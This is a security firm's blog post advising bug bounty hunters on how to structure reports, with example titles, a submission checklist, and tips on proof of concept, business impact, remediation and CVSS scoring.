BIPI
BIPI

Writing Bug Bounty Reports That Get Paid: Structure, PoC, Impact

Cybersecurity

The difference between a triaged report and a rejected one is rarely the bug. It is the writing. Here is the structure that gets you paid: clear title, minimal PoC, business impact, and a remediation that the engineer can ship on Monday.

By Arjun Raghavan, Security & Systems Lead, BIPI · June 2, 2023 · 9 min read

#bug-bounty#reporting#poc#vulnerability-disclosure

Triagers read hundreds of reports a week

Your report competes with noise. If a triager cannot understand the bug, the impact, and the fix within ninety seconds, your report gets queued, deprioritised, or closed as informational.

The five-section structure

  1. Title that names the bug, the asset, and the impact in one line
  2. Summary in three sentences, no jargon
  3. Reproduction steps, numbered, copy-pasteable
  4. Proof of concept, minimal and self-contained
  5. Business impact and remediation

Title patterns that work

  • IDOR on /api/orders/{id} allows reading any user invoice
  • Stored XSS in profile bio leads to session theft for admin users
  • SSRF in webhook URL field reaches AWS IMDS and returns IAM credentials

Bad titles say things like security issue, possible vulnerability, or critical bug. They get ignored.

Reproduction steps

Number every step. Include exact URLs, exact payloads, exact headers. Assume the triager has a fresh account and no context. If a step needs a specific account state, say so on line one.

Proof of concept

A good PoC is short, runs once, and shows the impact without burning the company. Screenshots help, but a curl one-liner or a thirty-second asciinema recording is better.

Business impact, written for humans

Do not paste CVSS strings and expect the program to convert them into urgency. Translate the bug into money, trust, or compliance. Example: any logged-in user can read every invoice in the system, exposing PII for roughly two hundred thousand customers and violating DPDPA Section 8.

Remediation that ships

  • Name the exact file or endpoint if you can
  • Suggest the fix in one sentence, not a lecture
  • Link to the framework's documented secure pattern
  • Note any related endpoints that likely share the bug

CVSS, but used correctly

Include a CVSS 3.1 vector and a link to the calculator with your values pre-filled. Programs override your score anyway, but a well-justified vector signals seriousness.

What to never include

  • Threats, deadlines, or hints of public disclosure
  • Tool output dumps with no analysis
  • Other companies you have reported to
  • Speculation about impact you did not verify
Triagers reward clarity, not cleverness. Write the report you would want to receive at 9am on a Monday.

The submit checklist

  1. Title names bug, asset, impact
  2. Three-sentence summary at the top
  3. Reproduction steps tested from a fresh session
  4. Minimal PoC with no destructive side effects
  5. Business impact in plain language
  6. Remediation pointing to a specific code path
  7. CVSS vector with justification

A well-written medium often gets paid faster than a poorly written critical. Treat reporting as a craft, not an afterthought.

Read more field notes, explore our services, or get in touch at info@bipi.in. Privacy Policy · Terms.